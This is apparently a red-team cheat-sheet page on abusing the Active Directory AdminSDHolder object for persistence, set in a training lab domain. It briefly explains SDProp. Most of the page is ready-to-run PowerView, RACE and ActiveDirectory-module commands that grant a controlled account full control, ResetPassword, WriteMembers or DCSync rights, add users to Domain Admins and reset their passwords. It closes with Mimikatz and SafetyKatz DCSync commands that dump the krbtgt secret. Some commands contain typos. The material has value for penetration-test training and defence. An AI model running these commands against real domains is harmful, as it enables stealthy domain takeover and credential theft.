AdminSDHolder

The following security accounts and groups are protected in Active Directory Domain Services:

Account Operators
Administrator
Administrators
Backup Operators
Domain Admins
Domain Controllers
Enterprise Admins
Krbtgt
Print Operators
Read-only Domain Controllers
Replicator
Schema Admins
Server Operators

AdminSDHolder

Admin Security Descriptor Holder is an ACL. The purpose of the AdminSDHolder object is to provide "template" permissions for the protected accounts and groups in the domain. Every 60min, the SDProp (Security Descriptor Propagator) runs on each DC, reads the ACLs and overwrites the ACL of all protected groups.

However, if an attacker modifies the ACL for AdminSDHolder, then those modified access permissions will automatically be applied to all protected objects instead. For example, an adversary might add a user account they control to the AdminSDHolder ACL and give it full control permissions:

With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.
- In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.

# Powerview

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 - Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Using ActiveDirectory Module and RACE toolkit (https://github.com/samratashok/RACE) :

Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 -
Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose

Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder,:

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Run SDProp manually using Invoke-SDPropagator.ps1 from Tools directory to make any of the above command take effect:

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

For pre-Server 2008 machines:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

More Examples - :

Check the Domain Admins permission - PowerView as normal user:

Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"}

Using ActiveDirectory Module:

(Get-Acl -Path 'AD:\CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}

Abusing Full-control using PowerView:

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

Using ActiveDirectory Module:

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

Abusing ResetPassword using PowerView:

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Using ActiveDirectory Module:

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Add Full Control rights, Powerview:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Using ActiveDirectory Module and RACE:

Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose

Add rights for DCSync:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Using ActiveDirectory Module and RACE:

Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose

Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

PreviousUsing ACLs NextRights Abuse

Last updated 1 year ago